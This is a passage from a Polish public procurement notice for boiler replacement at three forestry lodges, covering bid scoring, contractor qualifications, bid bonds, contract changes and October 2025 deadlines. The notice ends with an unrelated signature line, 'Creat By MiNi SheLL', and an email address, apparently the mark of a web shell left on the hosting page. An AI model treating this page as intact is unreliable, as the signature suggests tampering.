Wykonawca może otrzymać<br/>maksymalnie 100 pkt. Dla każdej oferty wynik oceny łącznej zostanie obliczony jako suma<br/>punktów przyznanych w powyższych kryteriach.<br/>14.3. Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.<br/>14.4. Za najkorzystniejszą ofertę uznana zostanie oferta Wykonawcy, która spełnia wszystkie<br/>wymagania określone w SWZ i uzyska największą liczbę punktów.<br/>14.5. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert<br/>przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród<br/>tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>14.6. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień<br/>dotyczących treści złożonych przez nich ofert lub innych składanych dokumentów lub<br/>oświadczeń. Wykonawcy są zobowiązani do przedstawienia wyjaśnień w terminie wskazanym<br/>przez Zamawiającego.<br/>14.7. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w pkt 14.5. SWZ,<br/>Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym<br/>przez Zamawiającego ofert dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 6.1. W postępowaniu mogą brać udział Wykonawcy, którzy nie podlegają wykluczeniu oraz<br/>spełniają warunki udziału w postępowaniu dotyczące:<br/>a) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.<br/>Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia na podstawie art.<br/>125 ust. 1 ustawy PZP,<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.<br/>Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia na podstawie art.<br/>125 ust. 1 ustawy PZP c) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.<br/>Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia na podstawie art.<br/>125 ust. 1 ustawy PZP,<br/>d) zdolności technicznej lub zawodowej:<br/>- w zakresie wykonanych robót budowlanych Wykonawca spełni warunek, jeżeli wykaże, że w<br/>okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy - w tym okresie, wykonał należycie co najmniej:<br/>􀀀 jedną robotę budowlaną polegającą na wymianie kotła c.o. wraz ze wszystkimi niezbędnymi<br/>pracami towarzyszącymi, koniecznymi do jego wykonania o wartości co najmniej 30 000,00 zł<br/>brutto (słownie: trzydzieści tysięcy złotych) oraz potwierdzi, że robota została wykonana<br/>należycie.<br/>Do każdej pozycji wykazu należy załączyć dowody określające, czy te roboty budowlane zostały<br/>wykonane należycie.<br/>W przypadku gdy Wykonawca złoży o ofertę na więcej niż jedną część, Zamawiający uzna<br/>warunek dysponowania zdolnością techniczną lub zawodową w zakresie wykonanych robót<br/>budowlanych za spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej 1 taką robotą –<br/>niezależnie od ilości Zadań, na które złoży ofertę.<br/>Wykonawca nie może sumować wartości kilku dostaw o mniejszym zakresie dla uzyskania<br/>wymaganej wartości. W przypadku Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia powyższy warunek musi spełniać w całości co najmniej jeden z Wykonawców<br/>(konsorcjantów). W przypadku świadczeń powtarzających się lub ciągłych, które Wykonawca<br/>nadal wykonuje, wymagane jest, aby już zrealizowany zakres dostawy (zamówienia) spełniał<br/>wymogi opisanego wyżej warunku.<br/>- w zakresie osób skierowanych do realizacji zamówienia:<br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje n/w osobą:<br/>􀀀 Kierownikiem robót posiadającym uprawnienia budowlane w specjalności instalacji<br/>sanitarnych bez ograniczeń.<br/>W przypadku gdy Wykonawca złoży ofertę na więcej niż jedno Zadanie, Zamawiający uzna<br/>warunek dysponowania Kierownikiem robót posiadającym uprawnienia budowlane do<br/>kierowania robotami w specjalności instalacji sanitarnych za spełniony, jeżeli Wykonawca<br/>wykaże, że dysponuje co najmniej 1taką osobą – niezależnie od ilości Zadań, na które złoży<br/>ofertę.<br/>UWA GA: Do obowiązków Wykonawcy należy zapewnienie odpowiedniej ilości osób<br/>skierowanych do realizacji zamówienia.<br/>Zgodnie z art. 12a Prawa budowlanego, który to odsyła do ustawy z dnia 22 grudnia 2015 r. o<br/>zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii<br/>Europejskiej (Dz. U. 2020 r. poz. 220) przynależność do właściwej izby samorządu zawodowego<br/>nie jest wymagana od obywateli państw członkowskich Unii Europejskiej, Konfederacji<br/>Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA)<br/>gdyż do posiadania uprawnień w wykonywaniu samodzielnych funkcji w budownictwie nie jest<br/>wymagana przynależność do izby samorządu zawodowego.<br/>6.2. Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z<br/>formułą „spełnia”/„nie spełnia”, w oparciu o informacje zawarte w dokumentach i<br/>oświadczeniach, o których mowa w rozdziale 7.<br/>6.3. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia przy uwzględnieniu<br/>poniższych warunków:<br/>a) żaden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać<br/>wykluczeniu z postępowania,<br/>b) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia Zamawiający<br/>dopuszcza, by warunek dotyczący zdolności technicznej lub zawodowej spełniał co najmniej<br/>jeden z Wykonawców,<br/>c) wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić<br/>odpowiedzialność solidarną za wykonanie umowy,<br/>d) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie<br/>Wykonawcę kierującego (lidera), upoważnionego do zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla wszystkich partnerów,<br/>e) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w<br/>całości przez lidera lub od wszystkich Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia łącznie lub każdego z osobna.<br/>6.4. Wykonawca może w celu potwierdzenia spełnienia warunków udziału w postępowaniu<br/>polegać na zdolnościach technicznych lub zawodowych innych podmiotów, niezależnie od<br/>charakteru prawnego łączących go z nimi stosunków prawnych przy uwzględnieniu poniższych<br/>warunków:<br/>a) w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych i<br/>doświadczenia, Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających<br/>zasoby, jeśli podmioty te zrealizują usługi, do realizacji których te zdolności są wymagane,<br/>b) Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających<br/>zasoby, złoży wraz z ofertą zobowiązanie podmiotu udostępniającego zasoby do oddania mu do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji niniejszego zamówienia oraz złoży<br/>oświadczenie, że spełnia wymagania określone w pkt. 7.2. lit. a) oraz b) SWZ.<br/>6.5. Zamawiający może na każdym etapie postępowania uznać, że Wykonawca nie posiada<br/>wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w<br/>szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne<br/>przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">7.1. W<br/>celu potwierdzenia braku podstaw do wykluczenia z postępowania, o których mowa w<br/>pkt 5.1. SWZ oraz w celu potwierdzenia spełniania warunków udziału w postępowaniu, o<br/>których mowa w pkt 6.1. SWZ Wykonawca będzie obowiązany przedstawić Zamawiającemu<br/>następujące oświadczenia i dokumenty (w terminach wskazanych w niniejszej SWZ):<br/>7.1.1. Każdy Wykonawca zobowiązany jest do złożenia wraz z ofertą w formie elektronicznej lub<br/>w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym<br/>wymienionych oświadczeń:<br/>a) oświadczenie o braku podstaw wykluczenia z postępowania o którym mowa w art. 125 ust. 1<br/>ustawy PZP (załącznik nr 5 do SWZ);<br/>b) oświadczenie o spełnianiu warunków udziału w postępowaniu o którym mowa w art. 125 ust.<br/>1 ustawy PZP (załącznik nr 6 do SWZ);<br/>7.1.2. Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień ich<br/>złożenia podmiotowych środków dowodowych wymienionych poniżej:<br/>a) wykaz wykonanych robót budo wlanych (porównywalnych z robotami stanowiącymi<br/>przedmiot zamówienia), wykonanych w okresie ostatnich 5 lat od dnia, w którym upływa termin<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z<br/>podaniem ich wartości brutto, przedmiotu (rodzaju wykonanych robót budowlanych), dat<br/>wykonania (dat dziennych rozpoczęcia i zakończenia realizacji) i podmiotów, na rzecz<br/>których roboty budowlane zostały wykonane (załącznik nr 7 do SWZ).<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych,<br/>wykonywanych wspólnie z innymi wykonawcami, wówczas w powyższym wykazie robót<br/>budowlanych zobowiązany jest podać jedynie te roboty budowlane w których wykonaniu<br/>Wykonawca ten bezpośrednio uczestniczył;<br/>b) dowody, że wskazane przez Wykonawcę roboty budowlane na potwierdzenie spełnienia<br/>warunku udziału w postępowaniu, dotyczące zdolności technicznej lub zawodowej w zakresie<br/>doświadczenia, zostały wykonane należycie.<br/>Dowodami, o których mowa powyżej są referencje bądź inne dokumenty sporządzone przez<br/>podmiot, na rzecz którego dostawy były wykonywane, a jeżeli Wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie<br/>dokumenty;<br/>c) oświadczenie Wykonawcy , w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do<br/>tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie<br/>konkurencji i konsumentów (tekst jedn. Dz. U. z 2024 r. poz. 594, 1237 ze zm.), z innym<br/>Wykonawcą, który złożył odrębną ofertę, albo oświadczenie o przynależności do tej samej grupy<br/>kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie<br/>oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej (załącznik<br/>nr 8 do SWZ),<br/>d) wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia<br/>niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami (załącznik nr 9 do SWZ).</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 9. WYMAGANIA DOTYCZĄCE WADIUM<br/>9.1. Zamawiający wymaga wniesienia wadium w kwotach:<br/>Część nr 1: Leśniczówka Dulcza: 500,00 zł<br/>Część nr 2: Leśniczówka Waryś: 500,00 zł<br/>Część nr 3: Leśniczówka Strzelce Wielkie: 500,00 zł<br/>Wadium należy wnieść przed upływem terminu składania ofert.<br/>9.2. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy<br/>z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn.:<br/>Dz.U. z 2025 r. poz. 98 ).<br/>9.3. Wadium wpłacane w pieniądzu należy wnieść na rachunek bankowy Zamawiającego w<br/>Banku Ochrony Środowiska S.A. /O Tarnów nr rachunku: : 97 1540 1203 2053 4288 5506 0003<br/>z dopiskiem: wadium na zabezpieczenie oferty w postępowaniu SA.270.18.2025 dla<br/>części________________. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym<br/>terminie składania ofert zostanie zaliczone na rachunku bankowym Zamawiającego. Wadium<br/>wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>9.4. Z treści wadium wnoszonego w formie: poręczenia bankowego, gwarancji bankowej,<br/>gwarancji ubezpieczeniowej lub poręczeniach udzielonych przez podmioty, o których mowa w<br/>art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju<br/>Przedsiębiorczości powinno wynikać bezwarunkowe, na pierwsze pisemne żądanie zgłoszone<br/>przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty<br/>Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 PZP.<br/>9.5. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, Wykonawca przekazuje<br/>Zamawiającemu oryginał gwarancji lub poręczenia w postaci elektronicznej.<br/>Wadium musi zabezpieczać ofertę przez cały okres związania ofertą. Oferta Wykonawcy, który<br/>nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy, zostanie odrzucona z<br/>postępowania na podstawie art. 226 ust. 1 pkt 14 PZP.<br/>9.6. Treść gwarancji wadialnej musi zawierać następujące elementy:<br/>1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia<br/>(Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających<br/>gwarancji/poręczenia) oraz wskazanie ich siedzib,<br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem –<br/>określenie przedmiotu zamówienia,<br/>3) kwotę gwarancji/poręczenia,<br/>4) zobowiązanie gwaranta/poręczyciela do zapłacenia bezwarunkowo i<br/>nieodwołalnie kwoty gwarancji/poręczenia na pierwsze pisemne żądanie Zamawiającego w<br/>okolicznościach określonych w art. 98 ust. 6 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Dla wszelkich zmian w niniejszej umowie wymagana jest forma pisemna z tym, że ewentualne zmiany mogą nastąpić<br/>jedynie w sytuacjach, o których mowa w art. 455 ustawy PZP, w szczególności:<br/>1.1 Zmiany osób uczestniczących w realizacji robót budowlanych - warunki tych zmian opisane są w §4 ust. 6-8 umowy,<br/>1.2 Zmiany terminów realizacji przedmiotu umowy - warunki tych zmian opisane są w §5 ust. 4 umowy,<br/>1.3 Ponadto zmiana terminu realizacji umowy może nastąpić:<br/> z powodu zaistnienia innej, niemożliwej do przewidzenia w momencie zawarcia umowy okoliczności prawnej, ekonomicznej<br/>lub technicznej, za którą żadna ze Stron nie ponosi odpowiedzialności, skutkującej brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją istotnych warunków zamówienia,<br/> z powodu zaistnienia okoliczności, której w chwili zawierania umowy nie można było przewidzieć, a wprowadzana zmiana<br/>jest korzystna dla Zamawiającego.<br/>1.4 Zmiany materiałów i wyrobów budowlanych użytych przy realizacji robót budowlanych; warunki tych zmian opisane są w<br/>§7 ust. 18-20 umowy,<br/>1.5 Roboty zamienne, dodatkowe, zaniechane; warunki tych zmian opisane są w §8 umowy,<br/>1.6 Zmiany wynagrodzenia; warunki tych zmian opisane są w §10 ust. 4-6 umowy.<br/>2. Jeżeli Wykonawca uzna konieczność wprowadzenia zmian do umowy, o których mowa w ust. 1 zobowiązany jest do<br/>przekazania Zamawiającemu wniosku dotyczącego zmiany umowy wraz z opisem zdarzenia lub okoliczności stanowiących<br/>podstawę do żądania takiej zmiany.<br/>3. Jeżeli Zamawiający uzna konieczność wprowadzenia zmian do umowy, o których mowa w ust. 1, zobowiązany jest do<br/>przekazania Wykonawcy pisemnej informacji w tym zakresie.<br/>4. Wniosek, o którym mowa w ust. 2 powinien zostać przekazany Zamawiającemu niezwłocznie od dnia, w którym<br/>Wykonawca dowiedział się, lub mógł dowiedzieć się o danym zdarzeniu lub okolicznościach.<br/>5. W terminie 7 dni roboczych od dnia otrzymania wniosku, o którym mowa wyżej (z zastrzeżeniem zapisów §4 ust. 7),<br/>Zamawiający zobowiązany jest do pisemnego ustosunkowania się do zgłoszonego żądania zmiany umowy i przekazania go<br/>Wykonawcy wraz z uzasadnieniem, zarówno w przypadku odmowy, jak i akceptacji żądania zmiany.<br/>6. Wszystkie ewentualne zmiany dotyczące terminu wykonania przedmiotu zamówienia będą określały zmianę terminu<br/>jedynie o czas niezbędny na ustanie przeszkody generującej zmianę lub czas niezbędny na realizację prac. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-03 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/1177713</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-03 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-11-02</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com